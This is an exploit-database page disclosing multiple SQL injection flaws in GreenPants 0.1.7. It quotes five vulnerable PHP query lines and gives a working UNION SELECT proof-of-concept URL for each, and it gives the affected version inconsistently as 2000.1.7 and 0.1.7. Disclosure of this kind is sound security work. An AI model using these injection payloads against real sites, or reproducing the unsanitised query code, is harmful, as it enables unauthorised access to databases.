header-logo
Suggest Exploit
vendor:
GreenPants
by:
Ptrace Security (Gianni Gnesa [gnix])
7.5
CVSS
HIGH
SQL Injections
89
CWE
Product Name: GreenPants
Affected Version From: 2000.1.7
Affected Version To: 2000.1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:greenpants:greenpants:0.1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 5.2
2011

GreenPants 0.1.7 Multiple Vulnerabilities

GreenPants 0.1.7 is vulnerable to multiple SQL Injections. The vulnerable files are indexheader.php, searcher.php, indexviewentry.php, editcat.php and editemot.php. An attacker can exploit these vulnerabilities by sending malicious input to the vulnerable parameters. For example, http://localhost/greenpants/index.php?id=-99 UNION SELECT VERSION() can be used to exploit the vulnerability in indexheader.php.

Mitigation:

Input validation should be used to prevent SQL Injections. The application should also be tested for SQL Injections using automated tools.
Source

Exploit-DB raw data:

# Exploit Title:   GreenPants 0.1.7 Multiple Vulnerabilities
# Date         :   19 March 2011
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/greenpants/
# Version      :   0.1.7
# Tested on    :   CentOS 5.2 with magic_quotes_gpc off
# Thanks to    :   The Resistance Group (http://www.ptrace.net/theresistance)

# SQL Injections

[01] ./pages/indexheader.php:36:	$res = consultarsql("SELECT tit FROM gp_entradas WHERE id=$id;"); 
     => http://localhost/greenpants/index.php?id=-99 UNION SELECT VERSION()

[02] ./pages/searcher.php:27:		$res = consultarsql("SELECT * FROM gp_entradas WHERE tit LIKE '%$s%'");
     => http://localhost/greenpants/index.php?s=4X0r' UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL -- '

[03] ./pages/indexviewentry.php:25:	$res = consultarsql("SELECT * FROM gp_entradas WHERE id=$id");
     => http://localhost/greenpants/index.php?id=-99 UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL 

[04] ./admin/pages/editcat.php:10:	$res = consultarsql("SELECT * FROM gp_categorias WHERE id=$id;");
     => http://localhost/greenpants/admin/index.php?do=editcat&i=-99 UNION SELECT NULL,VERSION(),NULL 

[05] ./admin/pages/editemot.php:10:	$res = consultarsql("SELECT * FROM gp_emoticonos WHERE id=$id;");
     => http://localhost/greenpants/admin/index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL

Navigation

Suggest Exploit

Services By CQR